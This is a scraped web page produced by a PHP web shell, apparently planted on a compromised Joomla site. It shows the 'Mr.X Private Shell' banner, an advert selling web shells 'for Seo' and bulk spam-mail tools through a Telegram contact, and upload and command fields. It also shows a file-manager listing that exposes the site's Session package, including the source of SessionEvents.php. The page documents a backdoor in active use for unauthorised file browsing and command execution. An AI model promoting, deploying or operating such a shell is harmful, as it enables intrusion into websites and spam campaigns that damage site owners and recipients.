__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * Part of the Joomla Framework Session Package
 *
 * @copyright  Copyright (C) 2005 - 2021 Open Source Matters, Inc. All rights reserved.
 * @license    GNU General Public License version 2 or later; see LICENSE
 */

namespace Joomla\Session;

/**
 * Class defining the events dispatched by the session API
 *
 * @since  2.0.0
 */
final class SessionEvents
{
	/**
	 * Private constructor to prevent instantiation of this class
	 *
	 * @since   2.0.0
	 */
	private function __construct()
	{
	}

	/**
	 * Session event which is dispatched after the session has been started.
	 *
	 * Listeners to this event receive a `Joomla\Session\SessionEvent` object.
	 *
	 * @var    string
	 * @since  2.0.0
	 */
	public const START = 'session.start';

	/**
	 * Session event which is dispatched after the session has been restarted.
	 *
	 * Listeners to this event receive a `Joomla\Session\SessionEvent` object.
	 *
	 * @var    string
	 * @since  2.0.0
	 */
	public const RESTART = 'session.restart';
}

Filemanager

Name Type Size Permission Actions
Command Folder 0775
Exception Folder 0775
Handler Folder 0775
Storage Folder 0775
Validator Folder 0775
HandlerInterface.php File 586 B 0664
Session.php File 15.1 KB 0664
SessionEvent.php File 1.03 KB 0664
SessionEvents.php File 1002 B 0664
SessionInterface.php File 5.32 KB 0664
SessionState.php File 1.93 KB 0664
StorageInterface.php File 3.6 KB 0664
ValidatorInterface.php File 626 B 0664
Filemanager